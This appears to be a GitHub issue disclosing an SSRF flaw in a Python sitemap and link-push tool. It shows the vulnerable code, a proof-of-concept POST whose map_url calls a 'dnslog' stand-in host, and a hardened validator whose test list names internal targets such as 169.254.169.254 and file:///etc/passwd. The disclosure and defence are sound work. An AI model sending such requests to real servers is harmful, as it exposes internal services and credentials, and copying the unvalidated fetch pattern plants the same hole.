Open v9d0g opened 1 day ago
\apps\tool\apis\bd_push.py does not securely filter user input through push_urls() and get_urls().
```python
import re

import requests


def push_urls(url, urls):
    '''Push links through the API provided by Baidu Webmaster Tools.'''
    headers = {
        'User-Agent': 'curl/7.12.1',
        'Host': 'data.zz.baidu.com',
        'Content-Type': 'text/plain',
        'Content-Length': '83'
    }
    try:
        # `url` is sent to requests.post() as-is, without any validation
        html = requests.post(url, headers=headers, data=urls, timeout=5).text
        return html
    except Exception:
        return "{'error':404,'message':'Request timed out or the API address is wrong!'}"


def get_urls(url):
    '''Extract every link from a site's sitemap; the argument must be the sitemap URL.'''
    try:
        # `url` is fetched as-is, so any scheme, host or port the caller supplies is reached
        html = requests.get(url, timeout=5).text
    except Exception:
        return 'miss'
    else:
        urls = re.findall(r'<loc>\s*?(.*?)\s*?</loc>', html)
        return '\n'.join(urls)
```
Attackers can customize GET or POST requests to cause SSRF.
```http
POST /tool/baidu-linksubmit-sitemap/ HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8000/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 120
Origin: http://127.0.0.1:8000
Connection: close
Cookie: csrftoken=E7JjnejsrYbCZndzQ7z7CDbvPbqL1E5VfOmVT5uINgM8AvJNEPZI6VvmvzHpzVz8;
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0

csrfmiddlewaretoken=DngWjg7qXZtGABxHkRmtVWsd18Na7TIUe4TyP7iGjh4cbJ3V8zM4peM4Hw4OFac7&url=1&map_url=http://dnslog
```
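One way to close the hole in `get_urls()`, as an added example that is not part of the issue or of the project's code: validate the sitemap URL before any request is made, allow only `http`/`https` on ports 80/443, reject credentials in the URL, resolve the hostname and refuse any answer that is loopback, private, link-local, multicast, reserved or unspecified (including IPv4-mapped IPv6 forms), and disable redirect following so a public host cannot bounce the request to an internal one. The function names `is_safe_sitemap_url`, `safe_get_urls` and the injectable `fetch` callable are assumptions made for this example; the sample sitemap body in the test is constructed.

```python
import ipaddress
import re
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def _is_public(addr):
    """True only for addresses that are routable on the public Internet."""
    # Unwrap ::ffff:127.0.0.1 style addresses so the IPv4 checks apply to them.
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return not (
        addr.is_private
        or addr.is_loopback
        or addr.is_link_local
        or addr.is_multicast
        or addr.is_reserved
        or addr.is_unspecified
    )


def _resolve_all(host):
    """Every address the host resolves to; a single bad record rejects the host."""
    infos = socket.getaddrinfo(host, None)
    # Strip a possible IPv6 scope id ("fe80::1%eth0") before parsing.
    return [ipaddress.ip_address(info[4][0].split("%")[0]) for info in infos]


def is_safe_sitemap_url(url):
    """Allow-list check for a user-supplied sitemap URL (hypothetical helper)."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    if parts.username or parts.password:
        return False
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:  # non-numeric or out-of-range port
        return False
    if port not in ALLOWED_PORTS:
        return False
    try:
        addrs = _resolve_all(parts.hostname)
    except (socket.gaierror, ValueError):
        # Unresolvable names (such as an attacker's DNS-log domain in an
        # offline environment) are rejected rather than passed through.
        return False
    return bool(addrs) and all(_is_public(a) for a in addrs)


def _requests_fetch(url):
    """Default fetcher: no redirects, short timeout. Imported lazily so the
    validation logic above is testable without the requests package."""
    import requests
    resp = requests.get(url, timeout=5, allow_redirects=False)
    resp.raise_for_status()
    return resp.text


def safe_get_urls(url, fetch=_requests_fetch):
    """Hardened replacement for get_urls(): validate first, then fetch."""
    if not is_safe_sitemap_url(url):
        raise ValueError("sitemap URL rejected by SSRF policy: %r" % url)
    html = fetch(url)
    urls = re.findall(r"<loc>\s*(.*?)\s*</loc>", html)
    return "\n".join(u.strip() for u in urls)


if __name__ == "__main__":
    for candidate in ("http://127.0.0.1:8000/", "http://169.254.169.254/latest/meta-data/",
                      "file:///etc/passwd", "http://[::1]/", "http://93.184.216.34/sitemap.xml"):
        print(candidate, "->", "allowed" if is_safe_sitemap_url(candidate) else "rejected")
```

Two caveats a reviewer would raise against this check. First, the validation resolves the name once and the HTTP client resolves it again, so a DNS-rebinding host can answer with a public address for the check and a private one for the request; closing that gap means connecting to the already-validated IP and setting the `Host` header yourself, or sending outbound traffic through an egress proxy that enforces the same policy. Second, `push_urls()` should not accept a caller-controlled `url` at all: the Baidu endpoint is fixed, so it belongs in configuration, with only the link list coming from the user.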